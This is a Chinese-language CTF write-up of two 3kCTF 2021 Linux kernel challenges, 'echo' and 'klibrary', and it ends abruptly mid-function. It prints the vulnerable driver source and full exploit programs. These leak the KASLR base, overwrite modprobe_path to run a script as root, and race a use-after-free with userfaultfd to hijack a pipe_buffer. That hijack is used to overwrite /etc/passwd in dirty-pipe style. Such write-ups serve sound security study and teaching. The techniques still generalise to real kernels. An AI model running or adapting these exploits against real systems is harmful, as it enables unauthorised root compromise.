3kCTF2021 echo klibrary

文章目录

  • 前言
  • echo
  • klibrary

前言

今天状态不好,很多事情都不想干,就做一做简单的题目

echo

  • 内核版本:v5.9.10
  • smap/smep/kaslr 开启
  • modprobe_path 可写

题目给了源码,非常简单就是无限次的任意地址读写:

#include <linux/kernel.h>
#include <linux/syscalls.h>
#include <asm/uaccess_64.h>

// Syscall number : 548

/*
 * echo(to, from): copy 8 bytes from `from` to `to`. Neither pointer is
 * checked with access_ok(), so this is an arbitrary kernel read/write
 * primitive. Like copy_user_generic_unrolled itself, it returns the number
 * of bytes NOT copied (0 on success); a faulting address therefore yields
 * a non-zero count instead of an oops, which is what makes probing safe.
 */
SYSCALL_DEFINE2(echo, void*, to, void*, from) {
    unsigned long not_copied = copy_user_generic_unrolled(to, from, 8);
    return not_copied;
}

所以思路就比较简单了:先泄漏 kbase,然后用任意地址写覆盖 modprobe_path 即可。这个题目的关键就在于如何 bypass kaslr。

思路一:
当我们传入一个无效(未映射)的地址时,copy_user_generic_unrolled 并不会导致内核 crash:其访存带有 exception table fixup,读取/写入失败时返回的是尚未拷贝成功的字节数,成功时返回 0。这意味着可以用该 syscall 安全地探测内核地址是否映射。

所以利用该特性,我们可以爆破 page_offset_base(直接映射区起始地址);物理地址 0x9d000(即 page_offset_base + 0x9d000)处保存着 secondary_startup_64 的地址,用其减去未随机化时的值(exp 中为 0xffffffff81000030)即可得到 KASLR 偏移,从而泄漏 kbase。

思路二:
在 v5.9.10 内核中,cpu_entry_area 区域(0xfffffe0000000000 起)并没有参与随机化,其起始处是 IDT:每项 16 字节的门描述符,从 +4 处读 8 字节即可得到中断处理函数地址的高 6 字节(下面 dump 中每隔 0x10 出现的 0x...8e00 就是描述符的类型字节,0x8e 即 present 的中断门),因此可以用来泄漏 kbase:

gef> x/16gx 0xfffffe0000000000+4
0xfffffe0000000004:     0xffffffff9f008e00      0x00100a7000000000
0xfffffe0000000014:     0xffffffff9f008e03      0x00100f1000000000
0xfffffe0000000024:     0xffffffff9f008e02      0x00100a1000000000
0xfffffe0000000034:     0xffffffff9f00ee00      0x0010087000000000
0xfffffe0000000044:     0xffffffff9f00ee00      0x0010089000000000
0xfffffe0000000054:     0xffffffff9f008e00      0x001009f000000000
0xfffffe0000000064:     0xffffffff9f008e00      0x001008b000000000
0xfffffe0000000074:     0xffffffff9f008e00      0x00100aa000000000

最后 exp 如下:

#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <signal.h>
#include <string.h>
#include <stdint.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/ioctl.h>
#include <sched.h>
#include <ctype.h>
#include <sys/types.h>

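/*
 * Trigger the overwritten modprobe_path and read the flag.
 *
 * /tmp/x is the script the kernel will run as modprobe (as root): it makes
 * /flag.txt world-readable. /tmp/dummy carries an unknown executable magic
 * (0xffffffff), so exec'ing it falls through binfmt and the kernel spawns
 * the program named by modprobe_path. Expects modprobe_path to already
 * point at "/tmp/x" (exp1/exp2 do that); the exec error itself is expected.
 */
void get_flag(){
        system("echo -ne '#!/bin/sh\n/bin/chmod 777 /flag.txt' > /tmp/x");
        system("chmod +x /tmp/x");
        system("echo -ne '\\xff\\xff\\xff\\xff' > /tmp/dummy");
        system("chmod +x /tmp/dummy");
        system("/tmp/dummy");
        /* sleep() takes whole seconds, so sleep(0.3) was sleep(0): give the
         * modprobe helper a moment to run before reading the flag. */
        usleep(300000);
        system("cat /flag.txt");
        exit(0);
}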

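/*
 * KASLR bypass #1: probe for page_offset_base, then leak the kernel slide.
 *
 * The echo syscall returns the number of bytes NOT copied, so reading an
 * unmapped address yields non-zero instead of an oops. Walk the candidate
 * direct-map range in 256 MiB steps until a read succeeds, read the
 * secondary_startup_64 pointer at physical 0x9d000 (see the write-up),
 * derive the slide from its non-KASLR value and point modprobe_path at
 * /tmp/x. Every primitive call is checked: a failed leak would leave
 * koffset == 0 and turn the final write into a write to a random address.
 */
void exp1() {

        uint64_t koffset = 0;
        uint64_t start = 0xffff880000000000;
        /* Sanity bound so a broken syscall cannot spin forever; the value is
         * only a limit, not a claim about where the direct map ends. */
        const uint64_t limit = 0xffffc90000000000;

        while (start < limit) {
                int64_t res = syscall(548, &koffset, start);
                if (!res) break;
                start += 0x10000000;
        }
        if (start >= limit) {
                puts("[x] page_offset_base not found");
                exit(1);
        }

        printf("[+] page_offset_base: %#lx\n", (unsigned long)start);
        if (syscall(548, &koffset, start+0x9d000) != 0) {
                puts("[x] leak of secondary_startup_64 failed");
                exit(1);
        }
        koffset -= 0xffffffff81000030;
        uint64_t modprobe_path = koffset + 0xffffffff81837cc0;
        printf("[+] koffset: %#lx\n", (unsigned long)koffset);
        printf("[+] modprobe_path: %#lx\n", (unsigned long)modprobe_path);

        /* 8-byte write: "/tmp/x" + NUL + pad overwrites the head of the
         * existing "/sbin/modprobe"; whatever follows the NUL is ignored. */
        char path[8] = "/tmp/x";
        if (syscall(548, modprobe_path, path) != 0) {
                puts("[x] write to modprobe_path failed");
                exit(1);
        }

        get_flag();
}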

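/*
 * KASLR bypass #2: cpu_entry_area sits at a fixed address in this kernel.
 *
 * The 8 bytes at 0xfffffe0000000004 are the tail of the first 16-byte IDT
 * gate (the dump in the write-up shows the 0x8e type byte every 0x10); the
 * upper bytes hold the handler address, 0xffffffff81208e00 in the
 * non-randomized image, so subtracting that constant gives the slide.
 * Both primitive calls are checked so a failure never turns into a write
 * to a garbage address.
 */
void exp2() {
        uint64_t koffset = 0;
        if (syscall(548, &koffset, 0xfffffe0000000004) != 0) {
                puts("[x] read of cpu_entry_area failed");
                exit(1);
        }
        koffset -= 0xffffffff81208e00;
        uint64_t modprobe_path = koffset + 0xffffffff81837cc0;
        printf("[+] koffset: %#lx\n", (unsigned long)koffset);
        printf("[+] modprobe_path: %#lx\n", (unsigned long)modprobe_path);

        /* 8-byte write: "/tmp/x" + NUL + pad over the head of "/sbin/modprobe". */
        char path[8] = "/tmp/x";
        if (syscall(548, modprobe_path, path) != 0) {
                puts("[x] write to modprobe_path failed");
                exit(1);
        }

        get_flag();
}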

/* Entry point: run the fixed-address (cpu_entry_area) variant. exp1 is the
 * brute-force alternative and stays disabled. */
int main(int argc, char** argv, char** envp)
{
        (void)argc;
        (void)argv;
        (void)envp;
        /* exp1(); */
        exp2();
        return 0;
}

效果如下:
在这里插入图片描述

klibrary

  • 内核版本:v5.9.10,可以使用 userfaultfd
  • smap/smep/kaslr/kpti 全开
  • SLUB 分配器,CONFIG_SLAB_FREELIST_HARDENED / CONFIG_SLAB_FREELIST_RANDOM 均未开启,也没有 kmalloc-cg 隔离,这可以帮助我们稳定地构造堆布局

题目给了源码,主要的问题是 CMD_REMOVE_ALL(删除所有堆块)与其它操作使用的是不同的互斥锁,两把锁互不排斥,所以对同一个链表(临界资源)存在竞争:

#include <linux/kernel.h>
#include <linux/fs.h>
#include <linux/mutex.h>
#include <linux/slab.h>
#include <linux/module.h>
#include <linux/uaccess.h>
#include <linux/device.h>

#define DEVICE_NAME "library"
#define CLASS_NAME "library"
#define BOOK_DESCRIPTION_SIZE 0x300

#define CMD_ADD			0x3000
#define CMD_REMOVE		0x3001
#define CMD_REMOVE_ALL	0x3002
#define CMD_ADD_DESC	0x3003
#define CMD_GET_DESC 	0x3004

/* Two independent locks: CMD_REMOVE_ALL takes remove_all_lock while every
 * other command takes ioctl_lock, so remove_all() can run concurrently with
 * the add/remove/edit/show paths that walk the same list (see library_ioctl). */
static DEFINE_MUTEX(ioctl_lock);
static DEFINE_MUTEX(remove_all_lock);

MODULE_AUTHOR("MaherAzzouzi");
MODULE_DESCRIPTION("A library implemented inside the kernel.");
MODULE_LICENSE("GPL");

static int major;
static long library_ioctl(struct file* file, unsigned int cmd, unsigned long arg);
static int library_open(struct inode* inode, struct file *filp); 
static int library_release(struct inode* inode, struct file *filp); 

static struct file_operations library_fops = {
	.owner = 			THIS_MODULE,
	.unlocked_ioctl = 	library_ioctl,
	.open = 			library_open,
	.release = 			library_release
};

static struct class* library_class = NULL;
static struct device* library_device = NULL;

/* One library entry: 0x300 bytes of description followed by the user-chosen
 * index and doubly-linked list pointers (0x318 bytes total, i.e. kmalloc-1k).
 * The list rooted at `root` is global and shared by every opener. */
struct Book {
	char book_description[BOOK_DESCRIPTION_SIZE]; // 0x300
	unsigned long index;
	struct Book* next;
	struct Book* prev;
} *root;

/* ioctl argument, copied from user space for every command (including
 * CMD_REMOVE_ALL, which ignores both fields). */
struct Request {
	unsigned long index;
	char __user * userland_pointer;
};

unsigned long counter = 1;

static int add_book(unsigned long index);
static int remove_book(unsigned long index);
static noinline int remove_all(void);
static int add_description_to_book(struct Request request);
static int get_book_description(struct Request request);

/* open(): no per-file state is allocated; every opener shares the global
 * list rooted at `root`, so two fds on /dev/library operate on the same data. */
static int library_open(struct inode* inode, struct file *filp) {
	
	printk(KERN_INFO "[library] : manage your books safely here!\n");
	return 0;
}


/* release(): frees the whole list via remove_all() WITHOUT taking either
 * mutex, so a close() races against in-flight ioctls exactly like
 * CMD_REMOVE_ALL does. */
static int library_release(struct inode* inode, struct file *filp) {
	printk(KERN_INFO "[library] : vulnerable device closed! try harder.\n");
	remove_all();
	return 0;
}

/*
 * ioctl entry point. The Request is copied in before dispatch, so every
 * command needs a readable `arg`. The helpers' -1 results are discarded:
 * the ioctl returns 0 for every command, and -1 (not -EFAULT) for a bad
 * user pointer.
 */
static long library_ioctl(struct file* file, unsigned int cmd, unsigned long arg) {
	struct Request request;
	
	if(copy_from_user((void*)&request, (void*)arg, sizeof(struct Request))) {
		return -1;
	}
	/* CMD_REMOVE_ALL is serialized by remove_all_lock only, every other
	 * command by ioctl_lock only. Neither lock excludes the other, so
	 * remove_all() can kfree() a Book while add_description_to_book() or
	 * get_book_description() is still copying through it: use-after-free.
	 * The write-up widens that window by stalling the copy with userfaultfd. */
	if(cmd == CMD_REMOVE_ALL) {
		mutex_lock(&remove_all_lock);
		remove_all();
		mutex_unlock(&remove_all_lock);	
	} else {
		mutex_lock(&ioctl_lock);

		switch(cmd) {
				case CMD_ADD:
						add_book(request.index);
						break;
				case CMD_REMOVE:
						remove_book(request.index);
						break;
				case CMD_ADD_DESC:
						add_description_to_book(request);
						break;
				case CMD_GET_DESC:
						get_book_description(request);
						break;
				/* unknown cmd: silently ignored, still returns 0 */
		}

		mutex_unlock(&ioctl_lock);
	}
	return 0;

}

/*
 * Append a new Book with the given index to the tail of the global list.
 * Refuses once `counter` reaches 10 (counter starts at 1, so at most nine
 * books fit); duplicate indices are not checked. Returns 0, or -1 when the
 * library is full or the allocation fails.
 */
static int add_book(unsigned long index) {
	struct Book *node, *tail;

	if(counter >= 10) {
		printk(KERN_INFO "[library] can only hold 10 books here\n");
		return -1;
	}

	node = (struct Book*)kzalloc(sizeof(struct Book), GFP_KERNEL); // kmalloc-1k
	if(node == NULL) {
		printk(KERN_INFO "[library] : allocation failed! \n");
		return -1;
	}

	node->index = index;
	/* kzalloc already zeroed next/prev, so only the link into the existing
	 * list differs between the empty and non-empty cases. */
	if(root == NULL) {
		root = node;
	} else {
		for(tail = root; tail->next != NULL; tail = tail->next)
			;
		tail->next = node;
		node->prev = tail;
	}

	counter++;
	return 0;
}

/*
 * Unlink and free the Book whose index matches. Two defects the write-up
 * points out, neither of which is the exploited bug:
 *  - a missing index only logs; `p` is then NULL and dereferenced below;
 *  - the tail node has next == NULL, so `next->prev = prev` is a NULL
 *    dereference whenever a non-root tail node is removed.
 */
static int remove_book(unsigned long index) {
	struct Book *p, *prev, *next;
	if(root == NULL) {
		printk(KERN_INFO "[library] : no books in the library yet.");
		return -1;
	} 
	else if (root->index == index) {
		p = root;
		root = root->next;
		/* the new root keeps a stale prev pointer to the freed node */
		kfree(p);
	}
	else {
		p = root;
		while(p != NULL && p->index != index)
			p = p->next;
		
		if(p == NULL) {
			printk(KERN_INFO "[library] : can't remove %ld reason : not found\n", index);
		}
		/* no return above: p == NULL falls straight into p->prev */

		prev = p->prev;
		next = p->next;
		prev->next = next;
		next->prev = prev; // next maybe null ==> bug but not vuln
		
		kfree(p);
	}

	counter--;

	return 0;
}

/*
 * Free every Book in the list and reset the global state (root = NULL,
 * counter = 1). Takes no lock itself: callers are responsible, and
 * library_release() calls it with none at all.
 */
static noinline int remove_all(void) {
	struct Book *cur, *next;

	for(cur = root; cur != NULL; cur = next) {
		next = cur->next;   /* read before kfree: cur is gone afterwards */
		kfree(cur);
	}

	root = NULL;
	counter = 1;
	return 0;
}

/*
 * CMD_ADD_DESC: copy BOOK_DESCRIPTION_SIZE bytes from request.userland_pointer
 * into the Book with the matching index. There is no return statement on the
 * success path, so the value returned there is indeterminate (the caller
 * ignores it anyway).
 */
static int add_description_to_book(struct Request request) {
	struct Book* book = root;

	if(book == NULL){
		printk(KERN_INFO "[library] : no books in the library yet.\n");
		return -1;
	}
	

	for(; book != NULL && book->index != request.index; book = book->next);

	if(book == NULL) {
		printk(KERN_INFO "[library] : the given index wasn't found\n");
		return -1;
	}

	/* copy_from_user may sleep on a page fault in the user buffer. A
	 * concurrent remove_all() (different lock) can kfree(book) meanwhile,
	 * turning this into a 0x300-byte write into a freed slab object. */
	if(copy_from_user((void*)book->book_description,
					  (void*)(request.userland_pointer),
					  BOOK_DESCRIPTION_SIZE)) {
		printk(KERN_INFO "[library] : copy_from_user failed for some reason.\n");
		return -1;
	}
}

/*
 * CMD_GET_DESC: copy the matching Book's BOOK_DESCRIPTION_SIZE bytes out to
 * request.userland_pointer. No return statement on the success path, so the
 * value returned there is indeterminate (the caller ignores it anyway).
 */
static int get_book_description(struct Request request) {
	struct Book* book;
	book = root;

	if(book == NULL) {
		printk("[library] : no books yet, can not read the description.\n");
		return -1;
	}

	while(book != NULL && book->index != request.index)
		book = book->next;

	if(book == NULL) {
		printk(KERN_INFO "[library] : no book with the index you provided\n");
		return -1;
	}

	/* copy_to_user may sleep on a page fault in the user buffer. A concurrent
	 * remove_all() (different lock) can kfree(book) meanwhile, so whatever
	 * object reclaims the slot is copied out: a 0x300-byte UAF read. */
	if(copy_to_user((void*)request.userland_pointer,
					(void*)book->book_description,
					BOOK_DESCRIPTION_SIZE)) {
		printk("[library] : copy_to_user failed!\n");
		return -1;
	}
}

/*
 * Module init: register the char device, then its class and /dev node.
 * Each failure path undoes what was already registered and returns -1
 * (the error codes carried by the class/device helpers are not propagated).
 */
static int __init init_library(void) {
	major = register_chrdev(0, DEVICE_NAME, &library_fops);
	if(major < 0)
		return -1;

	library_class = class_create(THIS_MODULE, CLASS_NAME);
	if(IS_ERR(library_class))
		goto err_chrdev;

	library_device = device_create(library_class, 0, MKDEV(major, 0), 0, DEVICE_NAME);
	if(IS_ERR(library_device))
		goto err_class;

	root = NULL;
	/* both mutexes are already initialised by DEFINE_MUTEX; kept as-is */
	mutex_init(&ioctl_lock);
	mutex_init(&remove_all_lock);
	printk(KERN_INFO "[library] : started!\n");
	return 0;

err_class:
	class_destroy(library_class);
err_chrdev:
	unregister_chrdev(major, DEVICE_NAME);
	return -1;
}

/* Module exit: tear down the /dev node, class and char device, then the
 * mutexes. Any Books still in the list are not freed here. */
static void __exit exit_library(void) {
	
	device_destroy(library_class, MKDEV(major, 0));
	class_unregister(library_class);
	class_destroy(library_class);
	unregister_chrdev(major, DEVICE_NAME);

	mutex_destroy(&ioctl_lock);
	mutex_destroy(&remove_all_lock);
	printk(KERN_INFO "[library] : finished!\n");
}

module_init(init_library);
module_exit(exit_library);

这里简单说一下,在 remove_book 函数中存在一个实现问题:

/*
 * Unlink and free the Book whose index matches. Two defects, neither of
 * which is the exploited bug:
 *  - a missing index only logs; `p` is then NULL and dereferenced below;
 *  - the tail node has next == NULL, so `next->prev = prev` is a NULL
 *    dereference whenever a non-root tail node is removed (the crash
 *    reproduced by the test program below).
 */
static int remove_book(unsigned long index) {
	struct Book *p, *prev, *next;
	if(root == NULL) {
		printk(KERN_INFO "[library] : no books in the library yet.");
		return -1;
	} 
	else if (root->index == index) {
		p = root;
		root = root->next;
		/* the new root keeps a stale prev pointer to the freed node */
		kfree(p);
	}
	else {
		p = root;
		while(p != NULL && p->index != index)
			p = p->next;
		
		if(p == NULL) {
			printk(KERN_INFO "[library] : can't remove %ld reason : not found\n", index);
		}
		/* no return above: p == NULL falls straight into p->prev */

		prev = p->prev;
		next = p->next;
		prev->next = next;
		next->prev = prev; // next maybe null ==> bug but not vuln
		
		kfree(p);
	}

	counter--;

	return 0;
}

这里堆块之间是使用双向链表连接,由于不是循环链表,所以尾堆块的 next 指针为 NULL,而在删除操作中没有对尾堆块进行单独的处理,所以这里可能存在对 NULL 的解引用,测试如下:

#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <signal.h>
#include <string.h>
#include <stdint.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/ioctl.h>
#include <sched.h>
#include <ctype.h>


/* Print errno for `msg`, pause so the output stays visible in the VM
 * console, then exit with failure. */
void err_exit(char *msg)
{
        perror(msg);
        sleep(2);
        exit(EXIT_FAILURE);
}


/* Userland mirror of the driver's struct Request (index, user pointer). */
struct Request {
        unsigned long idx;
        char *ptr;
};

#define CMD_ADD         0x3000
#define CMD_REMOVE      0x3001
#define CMD_REMOVE_ALL  0x3002
#define CMD_ADD_DESC    0x3003
#define CMD_GET_DESC    0x3004

int fd;
/* CMD_ADD: create a book whose index is `idx` (widened to unsigned long). */
void add(int idx) {
        struct Request req;
        req.idx = idx;
        req.ptr = NULL;
        ioctl(fd, CMD_ADD, &req);
}

/* CMD_REMOVE: delete the book whose index is `idx`. */
void dele(int idx) {
        struct Request req;
        req.idx = idx;
        req.ptr = NULL;
        ioctl(fd, CMD_REMOVE, &req);
}

/* Reproducer for the remove_book() NULL dereference: build the list
 * 0 <-> 1 <-> 2 and delete the tail, whose next pointer is NULL. */
int main(int argc, char** argv, char** envp)
{
        int i;
        (void)argc;
        (void)argv;
        (void)envp;

        fd = open("/dev/library", O_RDONLY);
        if (fd < 0) err_exit("open /dev/library");

        for (i = 0; i < 3; i++)
                add(i);
        dele(2);
        return 0;
}

最后由于引用 NULL 指针从而导致 crash
在这里插入图片描述
当然这个 bug 与漏洞利用无关,这里主要的问题还是锁机制的问题,remove_all 会释放所有的堆块,在对其进行操作时会获取 remove_all_lock 锁,而其它操作都是获取的 ioctl_lock 锁,所以这里存在竞争,我们可以在 edit 的过程中调用 remove_all 释放掉堆块,这时 edit 可能导致 UAF

这里我们可以获取 UAF 读和 UAF 写,首先说下 UAF 读,这里主要利用 get_book_description 函数:

/*
 * CMD_GET_DESC: copy the matching Book's BOOK_DESCRIPTION_SIZE bytes out to
 * request.userland_pointer. The copy at 【1】 is where the exploit stalls the
 * kernel with userfaultfd: `book` is still held here while remove_all()
 * (taken under the other lock) frees it.
 */
static int get_book_description(struct Request request) {
	struct Book* book;
	book = root;

	if(book == NULL) {
		printk("[library] : no books yet, can not read the description.\n");
		return -1;
	}

	while(book != NULL && book->index != request.index)
		book = book->next;

	if(book == NULL) {
		printk(KERN_INFO "[library] : no book with the index you provided\n");
		return -1;
	}

	if(copy_to_user((void*)request.userland_pointer, //【1】 <===== stall here with userfaultfd
					(void*)book->book_description,
					BOOK_DESCRIPTION_SIZE)) {
		printk("[library] : copy_to_user failed!\n");
		return -1;
	}
}

可以看到,我们可以在 【1】 处使用 userfaultfd 使其暂停,然后调用 remove_all 释放掉 book 堆块,然后分配其它对象占据该对象,最后恢复执行即可实现 UAF 读,UAF 写同理,其主要利用 add_description_to_book 函数,这里不再说明。然后这里的堆块大小为 kmalloc-1024

漏洞利用思路如下:
这里笔者测试发现无法创建新的命名空间,所以 USMA 打不了,然后 keyring 没有被编译,所以也用不了。最后笔者打的 dirty pipe,具体思路如下:

  • 分配一个 book1
  • get_book_description(book1) 读取内容,然后使用 userfaultfd 使其暂停,然后释放掉该 book1,然后立刻分配 pipe_buffer 占据该释放堆块,然后恢复执行即可读取 pipe_buffer 的内容
  • 分配一个 book2
  • add_description_to_book(book2) 写入内容,然后使用 userfaultfd 使其暂停,然后释放掉该 book2,然后立刻分配 pipe_buffer 占据该释放堆块,然后恢复执行即可修改 pipe_buffer 的内容

笔者尝试用 dirty pipe 直接改写 /bin/busybox 没有成功,于是(在本地环境中)给 /bin/busybox 加上了 s 位,转而用 dirty pipe 改写 /etc/passwd 的 root 行。(注:handler 中 splice 的 offset 为 1,因此随后通过 pipe 写入的数据会落在文件偏移 2 处;elfcode 省略了开头的 0x7f 后本应从偏移 1 开始写,这可能是改写 busybox 失败的原因,未验证。)最后 exp 如下:

#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <signal.h>
#include <string.h>
#include <stdint.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/ioctl.h>
#include <sched.h>
#include <linux/keyctl.h>
#include <ctype.h>
#include <pthread.h>
#include <sys/types.h>
#include <linux/userfaultfd.h>
#include <sys/sem.h>
#include <semaphore.h>
#include <poll.h>
#include <sys/ipc.h>


/* Print errno for `msg`, pause so the output stays visible in the VM
 * console, then exit with failure. */
void err_exit(char *msg)
{
        perror(msg);
        sleep(2);
        exit(EXIT_FAILURE);
}

/* Report a logic failure (no errno) in red, pause, then exit with failure. */
void fail_exit(char *msg)
{
        printf("\033[31m\033[1m[x] Error at: \033[0m%s\n", msg);
        sleep(2);
        exit(EXIT_FAILURE);
}

/* Print a green "[+]" status line. */
void info(char *msg)
{
        printf("\033[32m\033[1m[+] %s\n\033[0m", msg);
}

/* Print a green "[+] msg: 0x..." line for a pointer-sized value. */
void hexx(char *msg, size_t value)
{
        printf("\033[32m\033[1m[+] %s: %#lx\n\033[0m", msg, value);
}

/*
 * Hex-dump `len` bytes at `addr`: rows of four 64-bit words (32 bytes) with
 * the byte offset on the left and printable ASCII on the right. Only whole
 * words are printed in the hex column (len / 8 rounds down); the ASCII
 * column covers every byte of the row up to `len`. `desc`, if non-NULL, is
 * printed as a heading.
 */
void binary_dump(char *desc, void *addr, int len) {
    const uint64_t *words = (const uint64_t *) addr;
    const uint8_t *bytes = (const uint8_t *) addr;
    int nwords = len / 8;

    if (desc != NULL)
        printf("\033[33m[*] %s:\n\033[0m", desc);

    for (int w = 0; w < nwords; w += 4) {
        printf("  %04x", w * 8);
        for (int k = 0; k < 4; k++) {
            if (w + k < nwords)
                printf(" 0x%016lx", words[w + k]);
            else
                printf("                   ");
        }
        printf("   ");
        for (int k = 0; k < 32 && w * 8 + k < len; k++) {
            unsigned char c = bytes[w * 8 + k];
            printf("%c", isprint(c) ? c : '.');
        }
        puts("");
    }
}

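/*
 * Pin the calling process to CPU `core` (presumably so the racing ioctl and
 * the userfaultfd handler threads share one CPU). The original printed the
 * success message even when sched_setaffinity failed; report the failure
 * instead so a flaky race is not blamed on the wrong thing.
 */
void bind_core(int core)
{
    cpu_set_t cpu_set;

    CPU_ZERO(&cpu_set);
    CPU_SET(core, &cpu_set);
    if (sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set) < 0) {
        perror("[X] sched_setaffinity");
        return;
    }

    printf("\033[34m\033[1m[*] Process binded to core \033[0m%d\n", core);
}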

/* Userland mirror of the driver's struct Request (index, user pointer). */
struct Request {
        unsigned long idx;
        char *ptr;
};

#define CMD_ADD         0x3000
#define CMD_REMOVE      0x3001
#define CMD_REMOVE_ALL  0x3002
#define CMD_ADD_DESC    0x3003
#define CMD_GET_DESC    0x3004

int fd;
/* CMD_ADD: create a book whose index is `idx` (widened to unsigned long). */
void add(int idx) {
        struct Request req;
        req.idx = idx;
        req.ptr = NULL;
        ioctl(fd, CMD_ADD, &req);
}

/* CMD_REMOVE: delete the book whose index is `idx`. */
void dele(int idx) {
        struct Request req;
        req.idx = idx;
        req.ptr = NULL;
        ioctl(fd, CMD_REMOVE, &req);
}

/* CMD_ADD_DESC: the driver copies 0x300 bytes from `buf` into book `idx`.
 * Passing an unfaulted userfaultfd page as `buf` stalls that copy. */
void edit(int idx, char* buf) {
        struct Request req;
        req.idx = idx;
        req.ptr = buf;
        ioctl(fd, CMD_ADD_DESC, &req);
}

/* CMD_GET_DESC: the driver copies 0x300 bytes of book `idx` out to `buf`.
 * Passing an unfaulted userfaultfd page as `buf` stalls that copy. */
void show(int idx, char* buf) {
        struct Request req;
        req.idx = idx;
        req.ptr = buf;
        ioctl(fd, CMD_GET_DESC, &req);
}

/* CMD_REMOVE_ALL: free every book. The driver still copies a Request in,
 * so a zeroed one is passed even though its fields are ignored. */
void dele_all() {
        struct Request req;
        memset(&req, 0, sizeof(req));
        ioctl(fd, CMD_REMOVE_ALL, &req);
}

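/*
 * Create a userfaultfd, register [addr, addr+len) for missing-page faults
 * and start `handler` on its own thread with the uffd as argument. Exits
 * the process on any failure. `handler` must have the pthread start-routine
 * signature void *(*)(void *); it is passed through as void * by callers.
 */
void register_userfaultfd(pthread_t* moniter_thr, void* addr, long len, void* handler)
{
        long uffd;
        struct uffdio_api uffdio_api;
        struct uffdio_register uffdio_register;
        int rc;

        uffd = syscall(__NR_userfaultfd, O_NONBLOCK|O_CLOEXEC);
        if (uffd < 0) perror("[X] syscall for __NR_userfaultfd"), exit(-1);

        uffdio_api.api = UFFD_API;
        uffdio_api.features = 0;
        if (ioctl(uffd, UFFDIO_API, &uffdio_api) < 0) perror("[X] ioctl-UFFDIO_API"), exit(-1);

        uffdio_register.range.start = (long long)addr;
        uffdio_register.range.len = len;
        uffdio_register.mode = UFFDIO_REGISTER_MODE_MISSING;
        if (ioctl(uffd, UFFDIO_REGISTER, &uffdio_register) < 0) perror("[X] ioctl-UFFDIO_REGISTER"), exit(-1);

        /* pthread_create() returns a positive errno on failure and never a
         * negative value, so the original `< 0` test could never fire. */
        rc = pthread_create(moniter_thr, NULL, (void *(*)(void *))handler, (void*)uffd);
        if (rc != 0) {
                fprintf(stderr, "[X] pthread_create at register_userfaultfd: %s\n", strerror(rc));
                exit(-1);
        }
}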

struct page;
struct pipe_inode_info;
struct pipe_buf_operations;

/* Userland mirror of the kernel's struct pipe_buffer (5.9 layout: page,
 * offset/len, ops, flags, private — 40 bytes with padding). Filled by the
 * UAF read and written back, with `flags` changed, by the UAF write. */
struct pipe_buffer {
        struct page *page;
        unsigned int offset, len;
        const struct pipe_buf_operations *ops;
        unsigned int flags;
        unsigned long private;
};


//#define ATTACK_FILE "/bin/busybox"
#define ATTACK_FILE "/etc/passwd"
int attack_fd;
int pipe_fd[2][2];
struct pipe_buffer evil;

char copy_src[0x1000];
/*
 * userfaultfd handler for the UAF-read side (uffd_buf0).
 *
 * Runs when get_book_description()'s copy_to_user touches the still-unmapped
 * uffd_buf0 page, i.e. while the kernel holds a pointer to book 0 under
 * ioctl_lock. In this order:
 *   1. CMD_REMOVE_ALL frees the Book (it takes remove_all_lock, so it is not
 *      blocked by ioctl_lock);
 *   2. a fresh pipe plus a 1-byte splice allocates its pipe_buffer array,
 *      which presumably lands in the same kmalloc-1k slot the Book vacated
 *      (no freelist randomization in this kernel);
 *   3. UFFDIO_COPY resolves the fault, so copy_to_user resumes and copies
 *      the live pipe_buffer out to userland.
 * The free must precede the pipe allocation and both must precede the
 * UFFDIO_COPY. After the first fault the thread blocks in poll() for good.
 */
void* handler0(void* arg)
{
        struct uffd_msg msg;
        struct uffdio_copy uffdio_copy;
        long uffd = (long)arg;

        for(;;)
        {
                int res;
                struct pollfd pollfd;
                pollfd.fd = uffd;
                pollfd.events = POLLIN;
                if (poll(&pollfd, 1, -1) < 0) puts("[X] error at poll"), exit(-1);

                res = read(uffd, &msg, sizeof(msg));
                if (res == 0) puts("[X] EOF on userfaultfd"), exit(-1);
                if (res ==-1) puts("[X] read uffd in fault_handler_thread"), exit(-1);
                if (msg.event != UFFD_EVENT_PAGEFAULT) puts("[X] Not pagefault"), exit(-1);

                puts("[+] Now in userfaultfd handler0");
                dele_all();
                /* splice one byte of ATTACK_FILE so the pipe owns a page-cache
                 * page; the pipe_buffer describing it is what gets leaked */
                uint64_t offset = 1;
                if (pipe(pipe_fd[0]) < 0) err_exit("pipe");
                if (splice(attack_fd, &offset, pipe_fd[0][1], NULL, 1, 0) < 0)
                        err_exit("splice");

                /* copy_src is all zeros here; the page content does not matter
                 * for the read side, only that the fault is resolved */
                uffdio_copy.src = (long long)copy_src;
                uffdio_copy.dst = (long long)msg.arg.pagefault.address & (~0xFFF);
                uffdio_copy.len = 0x1000;
                uffdio_copy.mode = 0;
                uffdio_copy.copy = 0;
                if (ioctl(uffd, UFFDIO_COPY, &uffdio_copy) < 0) puts("[X] ioctl-UFFDIO_COPY"), exit(-1);
        }
}

/*
 * userfaultfd handler for the UAF-write side (uffd_buf1).
 *
 * Runs when add_description_to_book()'s copy_from_user touches the unmapped
 * uffd_buf1 page while the kernel holds a pointer to book 1. In this order:
 *   1. the leaked pipe_buffer (`evil`, from handler0's read) is copied into
 *      the page that will resolve the fault, with flags = 0x10 — the
 *      PIPE_BUF_FLAG_CAN_MERGE bit used by the dirty-pipe technique;
 *   2. CMD_REMOVE_ALL frees the Book (other lock, not blocked by ioctl_lock);
 *   3. a second pipe plus a 1-byte splice of ATTACK_FILE presumably reclaims
 *      the freed slot with its pipe_buffer array;
 *   4. UFFDIO_COPY resolves the fault, so copy_from_user resumes and writes
 *      `evil` over that array's first pipe_buffer.
 * A later write() into pipe_fd[1] is then merged into ATTACK_FILE's
 * page-cache page. The thread blocks in poll() after the first fault.
 */
void* handler1(void* arg)
{
        struct uffd_msg msg;
        struct uffdio_copy uffdio_copy;
        long uffd = (long)arg;

        for(;;)
        {
                int res;
